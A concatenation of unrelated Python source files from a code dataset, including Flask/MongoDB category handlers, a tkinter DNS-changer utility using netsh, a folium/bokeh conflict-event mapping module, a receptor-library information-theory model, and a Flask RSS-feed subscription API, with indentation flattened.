category = mongo.db.categories.find_one(
{"_id": (ObjectId(category_id))})
# Check if category is still in database
if category:
# Get category name
category_name = category["name"]
# Delete category from the database
mongo.db.categories.delete_one({"_id": (ObjectId(category_id))})
# Display flash message
flash(
"Category " + category_name +
" successfully deleted", "success")
return redirect(url_for('products.search'))
else:
# Display flash message
flash(
"Ooops.... selected category no longer " +
"exists in the database", "danger")
return redirect(url_for('categories.category_delete'))
category = mongo.db.categories.find_one(
{"_id": (ObjectId(category_id))})
return render_template(
"category_delete_confirm.html",
category_id=category_id, category=category)
def category_check(category_name):
"""
Check if category name already exists in the database
"""
if mongo.db.categories.find_one({"name": category_name}):
# Display flash message
flash("Category " + category_name +
" already exists in the database", "warning")
category_check = False
else:
category_check = True
return category_check
def category_get_id(category_name):
"""
Get category id from category name
"""
category_id = None
category = mongo.db.categories.find_one({"name": category_name})
# Check if category exists in database
if category:
category_id = category["_id"]
else:
flash(
"Ooops.... category " + category_name +
" no longer exists in the database", "danger")
return category_id
def category_get_name(category_id):
"""
Get category name from category id
"""
category_name = None
category = mongo.db.categories.find_one({"_id": category_id})
# Check if category exists in database
if category:
category_name = category["name"]
else:
flash(
"Ooops.... category " +
" no longer exists in the database", "danger")
return category_name
def category_get_selection(category_method):
"""
Get category name selected in Category Selector
"""
# Get existing category name
category_name = request.form.get("categorySelector").lower()
# If category has not been selected
if category_name == "category...":
# Display flash message
flash("Please select Category to " + category_method, "warning")
category_name = None
return category_name
def category_update(category_id, category_name):
"""
Update category in the database given category id and new category name
Returns category name
"""
mongo.db.categories.update_one(
{"_id": ObjectId(category_id)}, {"$set": {"name": category_name}})
flash("Category " + category_name + " successfully updated", "success")
return category_name
|
StarcoderdataPython
|
8154032
|
import json
import os, ctypes
import re
from tkinter import ttk
from tkinter import messagebox as msg
from tkinter import *
import psutil
import subprocess
from urllib.request import urlopen
class Application:
def __init__(self, master, DNS: dict, connections: list):
self.dns = DNS
self.master = master
self.connections = connections
self.providers = [provider for provider in self.dns.keys()]
self.vcmd = (master.register(self.validate)) # restriction for entry fields
Application.GUI(self)
try:
self.is_admin = os.getuid() == 0 # os.getuid exists on Unix only; the AttributeError fallback below handles Windows
except AttributeError:
self.is_admin = ctypes.windll.shell32.IsUserAnAdmin() == 1
if not self.is_admin:
msg.showwarning("Admin privilege", "Run the program as administrator")
self.Get_DNS()
self.Check_ip()
# main window interface
def GUI(self):
main_label = Label(self.master, text = "DNS Changer", fg = 'red', font = ("Bahnschrift", 18, "bold")).place(x = 135, y = 10)
# choose provider
provider_label = Label(self.master, text = "Providers:", font = ("Halvetica", 11)).place(x = 10, y = 70)
self.provider_var = StringVar()
self.provider_combobox = ttk.Combobox(self.master, textvariable = self.provider_var, values = self.providers, state = "readonly")
self.provider_combobox.set("Choose a provider")
self.provider_combobox.place(x = 145, y = 72, width = 142)
self.provider_combobox.bind("<<ComboboxSelected>>", self.provider_changes)
# Connections
connections_label = Label(self.master, text = "Connections:", font = ("Halvetica", 11)).place(x = 10, y = 110)
self.connections_combobox = ttk.Combobox(self.master, values = self.connections, state = "readonly")
self.connections_combobox.set("Ethernet")
self.connections_combobox.place(x = 145, y = 112, width = 142)
# Primary address
primary_address_label = Label(self.master, text = "Primary address:", font = ("Halvetica", 11)).place(x = 10, y = 150)
self.primary_address_var = StringVar()
self.primary_address_entry = ttk.Entry(self.master, textvariable = self.primary_address_var, state = "disabled", validate = 'all',
validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.primary_address_entry.place(x = 145, y = 152, width = 142)
# Secondary address
secondary_address_label = Label(self.master, text = "Secondary address:", font = ("Halvetica", 11)).place(x = 10, y = 190)
self.secondary_address_var = StringVar()
self.secondary_address_entry = ttk.Entry(self.master, textvariable = self.secondary_address_var, state = "disabled", validate = 'all',
validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.secondary_address_entry.place(x = 145, y = 192, width = 142)
# Delete button
self.delete_icon = PhotoImage(file = r'Icons/delete.png')
self.delete_btn = ttk.Button(self.master, text = "Delete", image = self.delete_icon, compound = LEFT, command = self.Delete)
self.delete_btn.place(x = 295, y = 70, width = 77, height = 25)
# Edit/Save button
self.edit_icon = PhotoImage(file = r'Icons/edit.png')
self.save_icon = PhotoImage(file = r'Icons/save.png')
self.edit_btn = ttk.Button(self.master, text = "Edit", image = self.edit_icon, compound = LEFT, command = lambda :self.Edit_and_Save(edit = True))
self.edit_btn.place(x = 292, y = 150, width = 79, height = 25)
# Set button
self.set_icon = PhotoImage(file = r'Icons/set.png')
self.set_btn = ttk.Button(self.master, text = "Set", image = self.set_icon, compound = LEFT, command = self.Execute)
self.set_btn.place(x = 250, y = 254, width = 122, height = 25)
# Reset button
self.reset_icon = PhotoImage(file = r'Icons/reset.png')
self.reset_btn =ttk.Button(self.master, text = "Reset", image = self.reset_icon, compound = LEFT, command = self.Reset)
self.reset_btn.place(x = 250, y = 294, width = 122, height = 25)
# Add button
self.add_icon = PhotoImage(file = r'Icons/add.png')
self.add_btn = ttk.Button(self.master, text = 'Add', image = self.add_icon, compound = LEFT, command = self.Toplevel)
self.add_btn.place(x = 250, y = 334, width = 122, height = 25)
# Refresh button
self.refresh_icon = PhotoImage(file = r'Icons/refresh.png')
self.refresh_btn = ttk.Button(self.master, text = 'Refresh', image = self.refresh_icon, compound = LEFT, command = self.Refresh)
self.refresh_btn.place(x = 250, y = 374, width = 122, height = 25)
# labelframe
self.labelframe = LabelFrame(self.master, background = 'black', relief = 'sunken').place(x = 10, y = 235, width = 220, height = 189)
# ip
self.ip_label = Label(self.labelframe, text = 'IP:',bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 242)
self.ip = Label(self.labelframe,bg = 'black', font = ('Bahnschrift', 11))
self.ip.place(x = 80, y = 242)
# country
self.country_label = Label(self.labelframe, text = 'Country:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 272)
self.country = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.country.place(x = 80, y = 272)
# region
self.region_label = Label(self.labelframe, text = 'Region:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 302)
self.region = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.region.place(x = 80, y = 302)
# city
self.city_label = Label(self.labelframe, text = 'City:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 332)
self.city = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.city.place(x = 80, y = 332)
# dns 1
self.dns1_label = Label(self.labelframe, text = 'DNS 1:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 362)
self.dns1 = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.dns1.place(x = 80, y = 362)
# dns 2
self.dns2_label = Label(self.labelframe, text = 'DNS 2:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 392)
self.dns2 = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.dns2.place(x = 80, y = 392)
# Toplevel window for adding
def Toplevel(self):
self.toplevel = Toplevel()
self.add_btn['state'] = 'disabled'
self.toplevel.bind('<Destroy>', self.addBtn_state)
screen_width = self.master.winfo_screenwidth()
screen_height = self.master.winfo_screenheight()
x = (screen_width/2) - (400/2 - 65)
y = (screen_height/2) - (440/2 - 120) # 65 and 120 are the offsets that center the toplevel window over the root window
self.toplevel.title("Add DNS")
self.toplevel.iconbitmap('Icons/dns.ico')
self.toplevel.geometry("270x200+%d+%d" % (x, y))
self.toplevel.resizable(False, False)
# Provider
provider_label = Label(self.toplevel, text = "Provider:", font = ("Halvetica", 11)).place(x = 10, y = 20)
self.provider_entry = ttk.Entry(self.toplevel)
self.provider_entry.place(x = 85, y = 22)
# Addresses
address1 = Label(self.toplevel, text = "Address 1:", font = ("Halvetica", 11)).place(x = 10, y = 60)
self.address1_entry = ttk.Entry(self.toplevel, validate = 'all', validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.address1_entry.place(x = 85, y = 62)
address2 = Label(self.toplevel, text = "Address 2:", font = ("Halvetica", 11)).place(x = 10, y = 100)
self.address2_entry = ttk.Entry(self.toplevel, validate = 'all', validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.address2_entry.place(x = 85, y = 102)
# Submit
self.submit_icon = PhotoImage(file = r'Icons/apply.png')
submit_btn = ttk.Button(self.toplevel, text = "Apply", image = self.submit_icon, compound = LEFT, command = self.Add)
submit_btn.place(x = 105, y = 145, width = 70)
# lock the root window until add window closes.
self.toplevel.transient()
self.toplevel.grab_set()
self.master.wait_window()
# check validation of user entries in dns fields
def validate(self, P, S, i):
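# Tk validatecommand substitutions: P = prospective entry value, S = text being inserted or deleted, i = index of the change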
if int(i) <= 14 and (str.isdigit(P) or P == "" or str.isdigit(S) or str(S) == "."):
return True
else:
return False
# update entry fields when the provider selection changes
def provider_changes(self, event):
self.primary_address_var.set(str(self.dns[self.provider_combobox.get()]["Primary Address"]))
self.secondary_address_var.set(str(self.dns[self.provider_combobox.get()]["Secondary Address"]))
# change the add button state from disabled back to normal when the add window closes
def addBtn_state(self, event):
self.add_btn['state'] = 'normal'
# write provider additions or deletions to 'DNS Addresses.json'
def Write_on_DNS(self):
with open('DNS Addresses.json', 'w') as file:
file.write(json.dumps(self.dns, indent = 4))
# check fields for adding dns
def Add(self):
provider = self.provider_entry.get()
dns1 = self.address1_entry.get()
dns2 = self.address2_entry.get()
try:
if not (re.search('[a-zA-z]', provider) or re.search('[0-9]', provider)):
msg.showerror("Error", "Please enter a valid name containing letters or numbers.")
return False
elif provider in list(self.dns.keys()):
msg.showerror("Error", "Provider already exists.")
return False
elif re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns1):
if dns2 == "" or re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns2):
pass
else:
msg.showerror("Error", "Enter secondary address in correct format.")
return False
elif dns1 == "":
msg.showerror("Error", "Primary address can not be empty.")
return False
else:
msg.showerror("Error", "Enter primary address in correct format.")
return False
except Exception as e:
msg.showerror("Error", e)
else:
self.dns.update({provider:{"Primary Address": dns1, "Secondary Address": dns2}})
self.Write_on_DNS()
self.provider_combobox['values'] = list(self.dns.keys())
self.toplevel.destroy()
# delete dns from json file
def Delete(self):
if not self.provider_combobox.get() == "Choose a provider":
del self.dns[str(self.provider_combobox.get())]
self.Write_on_DNS()
self.provider_combobox['values'] = list(self.dns.keys())
self.provider_combobox.set("Choose a provider")
self.primary_address_var.set("")
self.secondary_address_var.set("")
else:
msg.showerror("Wrong choice", "Choose a correct provider.")
# edit and save dns addresses
def Edit_and_Save(self, edit:bool):
dns1 = self.primary_address_entry.get()
dns2 = self.secondary_address_entry.get()
if edit:
if len(self.dns) == 0:
msg.showwarning("No provider", "First add a DNS profile with the Add button, then select it to edit.")
elif not self.provider_combobox.get() == "Choose a provider":
self.provider_combobox['state'] = 'disabled'
self.delete_btn['state'] = 'disabled'
self.set_btn['state'] = 'disabled'
self.add_btn['state'] = 'disabled'
self.primary_address_entry['state'] = 'normal'
self.secondary_address_entry['state'] = 'normal'
self.edit_btn.config(text = 'Save', image = self.save_icon, command = lambda: self.Edit_and_Save(edit = False))
else:
msg.showwarning('Wrong choice', 'First choose a provider to edit.')
else:
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns1):
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns2) or dns2 == "":
pass
else:
msg.showerror("Error", "Correct secondary address and try again.")
return False
self.provider_combobox['state'] = 'readonly'
self.delete_btn['state'] = 'normal'
self.set_btn['state'] = 'normal'
self.add_btn['state'] = 'normal'
self.primary_address_entry['state'] = 'disabled'
self.secondary_address_entry['state'] = 'disabled'
self.dns.update({self.provider_combobox.get():{
"Primary Address": str(dns1),
"Secondary Address": str(dns2)}})
self.Write_on_DNS()
self.edit_btn.config(text = 'Edit', image = self.edit_icon, command = lambda: self.Edit_and_Save(edit = True))
else:
msg.showerror("Error", "Correct primary address and try again.")
return False
# set dns to connection
def Execute(self):
dns1 = self.primary_address_var.get()
dns2 = self.secondary_address_entry.get()
adaptor = self.connections_combobox.get()
if dns1 != "":
try:
os.system(f"netsh interface ip set dns {adaptor} static address={dns1}")
if dns2 != "":
os.system(f"netsh interface ip add dns {adaptor} addr={dns2} index=2")
except Exception as e:
msg.showerror("Error", e)
else:
if not self.is_admin:
msg.showwarning("Admin privileges", "The requested operation requires elevation (Run as administrator).")
else:
self.Get_DNS()
msg.showinfo("Done", f"The DNS has been changed to {self.provider_combobox.get()}")
else:
msg.showerror("Error", "Choose a valid provider or check DNS addresses.")
# reset dns to default
def Reset(self):
try:
if self.is_admin:
subprocess.Popen(f"netsh interface ip set dns {self.connections_combobox.get()} dhcp")
msg.showinfo("Done", "The DNS provider has been reset to default")
else:
msg.showwarning("Admin privileges", "The requested operation requires elevation (Run as administrator).")
return False
except Exception as e:
msg.showerror("Error", e)
else:
self.Get_DNS()
# check ip details
def Check_ip(self):
try:
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
self.ip.config(text = data['ip'], fg = 'green')
self.country.config(text = data['country'], fg = 'green')
self.region.config(text = data['region'], fg = 'green')
self.city.config(text = data['city'], fg = 'green')
except Exception as e:
self.ip.config(fg = 'red', text = 'N/A')
self.country.config(fg = 'red', text = 'N/A')
self.region.config(fg = 'red', text = 'N/A')
self.city.config(fg = 'red', text = 'N/A')
msg.showerror("Error", e)
# get dns of connection
def Get_DNS(self):
try:
adaptor = self.connections_combobox.get()
config = subprocess.check_output(f'netsh interface ipv4 show config name={adaptor}', stdin = subprocess.PIPE, stderr = subprocess.STDOUT).decode()
config_list = re.sub(' +', ' ',re.search('Statically Configured DNS Servers:', config).string).split("\n")
primary_dns = False
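# netsh prints the primary DNS on the 'Statically Configured...' line and the secondary on the following line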
for i in config_list:
if primary_dns:
try:
dns2 = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', i).group()
self.dns2.config(text = dns2, fg = 'green')
break
except AttributeError:
self.dns2.config(text = 'N/A', fg = 'red')
break
if i.startswith(" Statically"):
primary_dns = True
dns1 = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', i).group()
self.dns1.config(text = dns1, fg = 'green')
except AttributeError:
self.dns1.config(text = 'N/A', fg = 'red')
self.dns2.config(text = 'N/A', fg = 'red')
# Refresh dns status and ip details
def Refresh(self):
self.Get_DNS()
self.Check_ip()
def main():
root = Tk()
root.title("DNS Changer")
root.iconbitmap('Icons/dns.ico')
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
x = (screen_width/2) - (400/2)
y = (screen_height/2) - (400/2)
root.geometry('400x440+%d+%d' % (x, y))
root.resizable(False, False)
connections = list((psutil.net_if_addrs()).keys())
try:
DNSs = json.load(open("DNS Addresses.json", "r"))
except FileNotFoundError:
with open("DNS Addresses.json", 'w') as file:
file.write(json.dumps({
"Google":{ # Provider
"Primary Address": "8.8.8.8", # First DNS address
"Secondary Address": "8.8.4.4" # Second DNS address
}
}, indent=4))
except json.JSONDecodeError as e:
msg.showerror("json decoding error", e)
finally:
DNSs = json.load(open("DNS Addresses.json", "r"))
app = Application(root, DNSs, connections)
root.mainloop()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
9618304
|
<gh_stars>0
def count():
import url
while True:
print(url.url)
|
StarcoderdataPython
|
179112
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from atvgnet import *
|
StarcoderdataPython
|
249012
|
<filename>threatmatrix/processing.py<gh_stars>0
import csv
import sqlalchemy
import folium
import pandas as pd
import cgi
import re
from pathlib import Path
from bokeh.models.widgets import RangeSlider, Button, DataTable, \
TableColumn, NumberFormatter
from bokeh.models import ColumnDataSource, Whisker
from bokeh.plotting import figure, show
from bokeh.layouts import row, widgetbox
from branca.colormap import LinearColormap
from threatmatrix.db import db_location
def get_data(n):
engine = sqlalchemy.create_engine(db_location)
conn = engine.connect()
df = pd.read_sql('events', conn)[:n]
df['notes'] = df['notes'].map(clean_note)
return df
def clean_note(note):
note = note.replace("'", "").replace('"', '')
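# long notes are broken into 10-word chunks joined with <br> so the folium tooltip wraps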
if len(note) > 100:
parts = []
for i in range(0, len(note.split()), 10):
parts.append(' '.join(note.split()[i:i+10]))
note = '<br>'.join(parts)
return note
def create_map(df, map_type):
if map_type == 'choropleth':
create_choropleth(df, columns=['country', 'fatalities'])
elif map_type == 'points':
create_points(df)
def create_points(df):
m = folium.Map(location=[35, 55], zoom_start=5, tiles='Stamen Terrain')
icons = {
'Default': 'info-sign',
'Riots/Protests': 'user',
'Battle-No change of territory': 'flash',
'Violence against civilians': 'pawn',
'Strategic development': 'globe',
'Remote violence': 'plane',
'Battle-Government regains territory': 'king',
'Battle-Non-state actor overtakes territory': 'queen',
'Non-violent transfer of territory': 'transfer',
'Headquarters or base established': 'tower'
}
points = df[['latitude', 'longitude', 'notes',
'event_type']].values.tolist()
for i in range(len(points)):
folium.Marker([float(points[i][0]),
float(points[i][1])],
tooltip=points[i][2],
icon=folium.Icon(icon=icons[points[i][3]])).add_to(m)
m.save(str(Path(__file__).parent.joinpath('maps/points.html')))
def get_color(feature, map_dict, columns, color_scale):
value = map_dict.get(feature['properties']["ADMIN"])
if value is None:
return '#8c8c8c' # MISSING -> gray
else:
return color_scale(value)
def create_choropleth(df, columns):
df[columns[1]] = pd.to_numeric(df[columns[1]], downcast='integer').fillna(0)
df = df.groupby(columns[0]).sum()[columns[1]].to_frame().reset_index()
map_dict = df.set_index(columns[0])[columns[1]].to_dict()
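# map_dict: country name -> summed value (e.g. fatalities), used below to color each GeoJSON feature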
country_geo = str(Path(__file__).parent\
.joinpath('assets/countries.geojson'))
color_scale = LinearColormap(['yellow','red'], vmin=min(map_dict.values()),
vmax=max(map_dict.values()))
m = folium.Map(location=[0, 0], zoom_start=3)
folium.GeoJson(
data = country_geo,
style_function = lambda feature: {
'fillColor': get_color(feature, map_dict, columns, color_scale),
'fillOpacity': 0.7,
'color' : 'black',
'weight' : 1,
}
).add_to(m)
m.save(str(Path(__file__).parent.joinpath('maps/choropleth.html')))
def create_bar_chart(df):
df['fatalities'] = pd.to_numeric(df['fatalities'])
df['fatalities'] = df['fatalities'].fillna(0)
sums = df.groupby('iso3')['fatalities'].sum().sort_values()
sums = sums[sums > 0]
countries = sums.index.values
counts = sums.values
p = figure(x_range=countries, plot_height=250,
title="Fatalities by Country")
p.vbar(x=countries, top=counts, width=0.5)
p.y_range.start = 0
p.xgrid.grid_line_color = None
return p
def create_table(df):
source = ColumnDataSource(data=dict())
current = df.sort_values('fatalities', ascending=False).head(10)
source.data = {
'Country' : current.country,
'Date' : current.event_date,
'Fatalities' : current.fatalities,
'Description' : current.notes,
}
columns = [
TableColumn(field="Country", title="Country"),
TableColumn(field="Date", title="Date"),
TableColumn(field="Fatalities", title="Fatalities"),
TableColumn(field="Description", title="Description")
]
data_table = DataTable(source=source, columns=columns, width=800)
table = widgetbox(data_table)
return table
|
StarcoderdataPython
|
11215533
|
'''
Created on Mar 31, 2015
@author: <NAME> <<EMAIL>>
'''
from __future__ import division
import numpy as np
from scipy import optimize
from .lib_bin_base import LibraryBinaryBase
LN2 = np.log(2)
class LibraryBinaryUniform(LibraryBinaryBase):
""" represents a single receptor library with random entries. The only
parameter that characterizes this library is the density of entries. """
def __init__(self, num_substrates, num_receptors, density=1,
parameters=None):
""" initialize the receptor library by setting the number of receptors,
the number of substrates it can respond to, and the fraction `density`
of substrates a single receptor responds to """
super(LibraryBinaryUniform, self).__init__(num_substrates,
num_receptors, parameters)
self.density = density
@property
def repr_params(self):
""" return the important parameters that are shown in __repr__ """
params = super(LibraryBinaryUniform, self).repr_params
params.append('xi=%g' % self.density)
return params
@property
def init_arguments(self):
""" return the parameters of the model that can be used to reconstruct
it by calling the __init__ method with these arguments """
args = super(LibraryBinaryUniform, self).init_arguments
args['density'] = self.density
return args
@classmethod
def get_random_arguments(cls, **kwargs):
""" create random arguments for creating test instances """
args = super(LibraryBinaryUniform, cls).get_random_arguments(**kwargs)
args['density'] = kwargs.get('density', np.random.random())
return args
def receptor_activity(self, ret_correlations=False, approx_prob=False,
clip=True):
""" return the probability with which a single receptor is activated
by typical mixtures """
q_n, q_nm = self.receptor_crosstalk(ret_receptor_activity=True,
approx_prob=approx_prob)
r_n = q_n
r_nm = q_n**2 + q_nm
if clip:
r_n = np.clip(r_n, 0, 1)
r_nm = np.clip(r_nm, 0, 1)
if ret_correlations:
return r_n, r_nm
else:
return r_n
def receptor_crosstalk(self, ret_receptor_activity=False, approx_prob=False):
""" calculates the average activity of the receptor as a response to
single ligands. """
p_i = self.substrate_probabilities
# get probability q_n and q_nm that receptors are activated
if approx_prob:
# use approximate formulas for calculating the probabilities
q_n = self.density * p_i.sum()
q_nm = self.density**2 * p_i.sum()
# clip the result to [0, 1]
q_n = np.clip(q_n, 0, 1)
q_nm = np.clip(q_nm, 0, 1)
else:
# use better formulas for calculating the probabilities
xi = self.density
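# q_n: probability that at least one substrate is both present (prob p_i) and within the receptor's binding fraction xi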
q_n = 1 - np.prod(1 - xi * p_i)
q_nm = np.prod(1 - (2*xi - xi**2) * p_i) - np.prod(1 - xi * p_i)**2
if ret_receptor_activity:
return q_n, q_nm
else:
return q_nm
def mutual_information(self, approx_prob=False,
excitation_method='logarithm',
mutual_information_method='default',
clip=True):
""" return a theoretical estimate of the mutual information between
input and output.
`excitation_method` determines which method is used to approximate
the mutual information. Possible values are `logarithm`, and
`overlap`, in increasing order of accuracy.
`approx_prob` determines whether a linear approximation should be
used to calculate the probabilities that receptors are active
"""
if excitation_method == 'logarithm':
# use the expansion of the mutual information around the optimal
# point to calculate an approximation of the mutual information
# determine the probabilities of receptor activations
q_n, q_nm = self.receptor_crosstalk(ret_receptor_activity=True,
approx_prob=approx_prob)
# calculate mutual information from this
MI = self._estimate_MI_from_q_stats(
q_n, q_nm, method=mutual_information_method)
elif excitation_method == 'overlap':
# calculate the MI assuming that receptors are independent.
# This expression assumes that each receptor provides a fractional
# information H_r/N_s. Some of the information will be overlapping
# and the resulting MI is thus smaller than the naive estimate:
# MI < N_r * H_r
# determine the probabilities of receptor activation
q_n = self.receptor_activity(approx_prob=approx_prob)
# calculate mutual information from this, ignoring crosstalk
MI = self._estimate_MI_from_q_stats(
q_n, 0, method=mutual_information_method)
# estimate the effect of crosstalk by calculating the expected
# overlap between independent receptors
H_r = MI / self.Nr
MI = self.Ns - self.Ns*(1 - H_r/self.Ns)**self.Nr
else:
raise ValueError('Unknown method `%s`' % excitation_method)
if clip:
# limit the MI to the mixture entropy
return np.clip(MI, 0, self.mixture_entropy())
else:
return MI
def density_optimal(self, approx=True, **kwargs):
""" return the estimated optimal activity fraction for the simple case
where all h are the same. The estimate relies on an approximation that
all receptors are independent and is thus independent of the number of
receptors. The estimate is thus only good in the limit of low Nr.
"""
# approximate using mean substrate size
m = self.substrate_probabilities.sum()
density_opt = min(0.5 / m, 1)
if approx:
return density_opt
# solve a numerical equation
obj = self.copy()
def reduction(density):
""" helper function that evaluates the mutual information """
obj.density = density
return -obj.mutual_information(**kwargs)
res = optimize.minimize(reduction, density_opt, bounds=[(0, 1)])
if res.success:
return res.x[0]
else:
raise RuntimeError(res)
def get_optimal_library(self):
""" returns an estimate for the optimal parameters for the random
interaction matrices """
return {'density': self.density_optimal(assume_homogeneous=True)}
|
StarcoderdataPython
|
1895094
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ProvisioningState(str, Enum):
creating = "Creating"
failed = "Failed"
succeeded = "Succeeded"
canceled = "Canceled"
class ComputeRole(str, Enum):
none = "None"
iaa_s = "IaaS"
paa_s = "PaaS"
class OperatingSystem(str, Enum):
none = "None"
windows = "Windows"
linux = "Linux"
class CompatibilityIssue(str, Enum):
higher_device_version_required = "HigherDeviceVersionRequired"
lower_device_version_required = "LowerDeviceVersionRequired"
capacity_billing_model_required = "CapacityBillingModelRequired"
pay_as_you_go_billing_model_required = "PayAsYouGoBillingModelRequired"
development_billing_model_required = "DevelopmentBillingModelRequired"
azure_ad_identity_system_required = "AzureADIdentitySystemRequired"
adfs_identity_system_required = "ADFSIdentitySystemRequired"
connection_to_internet_required = "ConnectionToInternetRequired"
connection_to_azure_required = "ConnectionToAzureRequired"
disconnected_environment_required = "DisconnectedEnvironmentRequired"
class Category(str, Enum):
azure_ad = "AzureAD"
adfs = "ADFS"
class Location(str, Enum):
global_enum = "global"
|
StarcoderdataPython
|
1742787
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ["api"]
import flask
import feedfinder2
from functools import wraps
from flask.ext.login import current_user
from .database import db
from .models import User, Feed
api = flask.Blueprint("api", __name__)
def _get_user():
token = flask.request.values.get("token")
if token is not None:
return User.query.filter_by(api_token=token).first()
return current_user
def private_view(func):
@wraps(func)
def decorated_view(*args, **kwargs):
user = _get_user()
# Check for invalid API tokens.
if user is None:
return flask.jsonify(message="Invalid API token."), 403
# Check to make sure that the current user is valid.
if not user.is_authenticated():
return flask.abort(404)
return func(*args, **kwargs)
return decorated_view
@api.route("/")
def index():
return flask.render_template("api.html")
@api.route("/new")
def new_key():
if not current_user.is_authenticated():
return flask.abort(404)
current_user.api_token = current_user.generate_token()
db.session.commit()
return flask.redirect(flask.url_for(".index"))
@api.route("/feeds")
@private_view
def feeds():
feeds = _get_user().feeds
return flask.jsonify(
count=len(feeds),
feeds=[feed.to_dict() for feed in feeds],
)
@api.route("/feed/<int:feedid>", methods=["GET"])
@private_view
def feed_info(feedid):
user = _get_user()
# Find the feed.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.id == feedid).first()
# If the user isn't subscribed, return a failure.
if feed is None:
return flask.jsonify(message="Invalid feed ID."), 400
return flask.jsonify(**(feed.to_dict()))
@api.route("/subscribe", methods=["GET", "POST"])
@private_view
def subscribe():
# Get the requested subscription URL.
add_url = flask.request.values.get("url")
if add_url is None:
return flask.jsonify(message="You must provide a URL."), 400
# Check to make sure that the user doesn't have too many subscriptions.
user = _get_user()
mx = flask.current_app.config.get("MAX_FEEDS", -1)
if mx > 0 and len(user.feeds) >= mx:
return flask.jsonify(message="You're already subscribed to the "
"maximum number of feeds."), 400
# Try to find a feed below the requested resource.
urls = feedfinder2.find_feeds(add_url)
if not len(urls):
return flask.jsonify(message="The robot can't find a feed at that "
"URL. Could you help it with a more specific "
"link?"), 400
url = urls[0]
# See if the user is already subscribed to a feed at that URL.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.url == url).first()
if feed is not None:
return flask.jsonify(
message="You've already subscribed to {0}.".format(feed.title),
feed=feed.to_dict(),
)
# See if a feed object already exists for that URL.
feed = Feed.query.filter(Feed.url == url).first()
# If it doesn't, create a new one.
if feed is None:
feed = Feed(url)
# Update the feed immediately to get the title, etc.
feed.update_info()
# Subscribe the current user.
user.feeds.append(feed)
db.session.commit()
return flask.jsonify(
message="Successfully subscribed to {0}.".format(feed.title),
feed=feed.to_dict(),
)
@api.route("/feed/<int:feedid>", methods=["DELETE"])
@private_view
def unsubscribe(feedid):
user = _get_user()
# Find the feed that the user wants to unsubscribe from.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.id == feedid).first()
# If the user isn't subscribed, return a failure.
if feed is None:
return flask.jsonify(message="Invalid feed ID."), 400
# Unsubscribe the user.
title = feed.title
user.feeds.remove(feed)
db.session.commit()
return flask.jsonify(message="Successfully unsubscribed from {0}."
.format(title))
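# --- Illustrative client sketch (not part of the blueprint above) ---
# ``_get_user`` reads the token from ``flask.request.values``, so it can be
# passed as a query parameter or form field. The base URL, token and feed id
# below are placeholders for a hypothetical deployment mounting this blueprint
# at /api.
if __name__ == "__main__":
    import requests
    BASE = "http://localhost:5000/api"    # hypothetical mount point
    TOKEN = "replace-with-a-real-token"   # obtained via the /new endpoint while logged in
    feeds = requests.get(BASE + "/feeds", params={"token": TOKEN}).json()
    print(feeds["count"], "subscriptions")
    requests.post(BASE + "/subscribe",
                  data={"token": TOKEN, "url": "http://example.com/blog"})
    requests.delete(BASE + "/feed/1", params={"token": TOKEN})   # hypothetical feed id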
|
StarcoderdataPython
|
6431547
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
import nlpregex.abs_graph.double_link
import nlpregex.abs_graph.node
import nlpregex.abs_graph.edge
import nlpregex.abs_graph.graph
import nlpregex.regular_language.sse_forrest
# @brief represents one symbolic equation that consists of LHS = RHS.
# LHS is a variable (state)
# RHS is a set of terms
#        a term consists of a pair of a variable and its coefficient.
# a coefficient is an AST
class SymbolicEquation():
def __init__( self, lhs, forrest ):
self.lhs = lhs # state
self.rhs = {} # k: state, v: coeff (top node of AST )
self.forrest = forrest # sseAST
    # @brief add a coefficient to the RHS
#
# @param j : column number
# @param symbols : list of terminals i.e., list of strings that represent numbers.
# e.g. 't0', 't1', ... 't999999'
# if there is only one terminal specified, the resultant AST is the terminal.
# if there are multiple terminals, then the resultant AST represents a selection
# whose children are the terminals.
# if there is a coefficient already present, then the symbols are added under
# the existing selection.
def add_coeff( self, j, param_symbols ):
if j not in self.rhs:
r = self.forrest.create_initial_union_node( param_symbols )
self.rhs[j] = r
else:
t1 = self.rhs[j] # Assume it is a term or a union
